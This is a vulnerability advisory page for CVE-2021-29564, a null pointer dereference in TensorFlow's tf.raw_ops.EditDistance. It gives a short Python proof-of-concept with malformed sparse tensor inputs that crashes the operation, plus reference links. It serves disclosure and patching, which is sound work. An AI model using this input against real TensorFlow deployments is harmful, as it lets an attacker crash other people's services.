CVE-2021-29564: Null pointer dereference in `EditDistance`
(updated )
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance
:
import tensorflow as tf
hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64)
hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32)
hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64)
truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64)
truth_values = tf.constant([], shape=[0], dtype=tf.float32)
truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64)
tf.raw_ops.EditDistance(
hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values,
hypothesis_shape=hypothesis_shape, truth_indices=truth_indices,
truth_values=truth_values, truth_shape=truth_shape, normalize=True)
References
- github.com/advisories/GHSA-75f6-78jr-4656
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-492.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-690.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-201.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/f4c364a5d6880557f6f5b6eb5cee2c407f0186b3
- github.com/tensorflow/tensorflow/security/advisories/GHSA-75f6-78jr-4656
- nvd.nist.gov/vuln/detail/CVE-2021-29564
Detect and mitigate CVE-2021-29564 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →